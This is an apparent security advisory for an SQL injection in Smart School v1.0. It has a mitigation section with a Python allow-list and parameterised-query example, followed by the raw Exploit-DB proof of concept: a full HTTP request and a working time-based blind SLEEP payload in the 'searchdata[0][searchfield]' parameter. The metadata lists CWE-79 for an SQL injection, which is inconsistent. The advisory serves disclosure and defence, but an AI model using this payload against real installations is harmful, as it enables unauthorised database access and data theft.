Vendor: Smart School
By: Ahmet Ümit BAYRAM
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 79
Product Name: Smart School
Affected Version From: Smart School v1.0
Affected Version To: Smart School v1.0
Patch Exists: NO
Related CWE:
CPE: a:codecanyon:smart_school:1.0
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux
Year: 2023

Smart School v1.0 – SQL Injection

The Smart School v1.0 application is vulnerable to SQL injection. This vulnerability allows an attacker to execute arbitrary SQL queries, potentially compromising the integrity and confidentiality of the database. By exploiting the 'searchdata[0][searchfield]' parameter, an attacker can inject malicious SQL code and manipulate the database.

Mitigation:

To mitigate this vulnerability, validate and sanitize the input that reaches the 'searchdata[0][searchfield]' parameter, and use prepared statements or parameterized queries for database access so that user input is never concatenated into SQL text. Regular security audits and updates should also be performed to identify and patch vulnerabilities.
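The injected parameter here is a column reference (online_courses.category_id), and a prepared statement cannot bind an identifier, so the practical fix is an allow-list of permitted `table.column` names plus a bound parameter for the search value. The following is an added Python/sqlite3 example of that pattern, not code from the advisory or from Smart School; every name except online_courses.category_id is assumed.

```python
import re
import sqlite3

# Constructed allow-list of filterable columns for a /course/filterRecords/
# style endpoint. Only online_courses.category_id comes from the advisory;
# the other column names are assumed for illustration.
ALLOWED_SEARCH_FIELDS = {
    "online_courses.category_id",
    "online_courses.title",
    "online_courses.created_at",
}

# Defence in depth: a column reference must look like `table.column` or
# `column`, so spaces, quotes, parentheses and comment markers are rejected
# before the allow-list lookup even happens.
IDENTIFIER_RE = re.compile(r"^[A-Za-z_]\w*(\.[A-Za-z_]\w*)?$")


class InvalidSearchField(ValueError):
    pass


def is_allowed_search_field(field: str) -> bool:
    """True only for a well-formed identifier that is on the allow-list."""
    return bool(IDENTIFIER_RE.match(field)) and field in ALLOWED_SEARCH_FIELDS


def filter_records(conn, searchdata):
    """Column names enter the SQL only after allow-list validation; the
    search values are bound with `?` placeholders, never interpolated."""
    clauses, params = [], []
    for item in searchdata:
        field = item["searchfield"]
        if not is_allowed_search_field(field):
            raise InvalidSearchField(f"rejected searchfield {field!r}")
        clauses.append(f"{field} = ?")
        params.append(item["searchvalue"])
    sql = "SELECT id, title FROM online_courses"
    if clauses:
        sql += " WHERE " + " AND ".join(clauses)
    return conn.execute(sql, params).fetchall()


def demo_db():
    """In-memory SQLite database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE online_courses (id INTEGER, title TEXT, category_id INTEGER)")
    conn.executemany("INSERT INTO online_courses VALUES (?, ?, ?)",
                     [(1, "Algebra", 1), (2, "Physics", 2), (3, "Geometry", 1)])
    return conn
```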

Exploit-DB raw data:

# Exploit Title: Smart School v1.0 - SQL Injection
# Date: 2023-05-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/smart-school-school-management-system/19426018
# Demo Site: https://demo.smart-school.in
# Tested on: Kali Linux
# CVE: N/A


### Request ###

POST /course/filterRecords/ HTTP/1.1
Host: localhost
Cookie: ci_session=dd1bqn8ulsiog4vf7fle5hd4k4fklvve
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://localhost
Referer: https://localhost/course/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

searchdata%5B0%5D%5Btitle%5D=category&searchdata%5B0%5D%5Bsearchfield%5D=online_courses.category_id&searchdata%5B0%5D%5Bsearchvalue%5D=1


### Parameter & Payloads ###

Parameter: searchdata[0][searchfield] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchdata[0][title]=category&searchdata[0][searchfield]=online_courses.category_id AND (SELECT 7313 FROM (SELECT(SLEEP(5)))mvaR)-- hAHp&searchdata[0][searchvalue]=1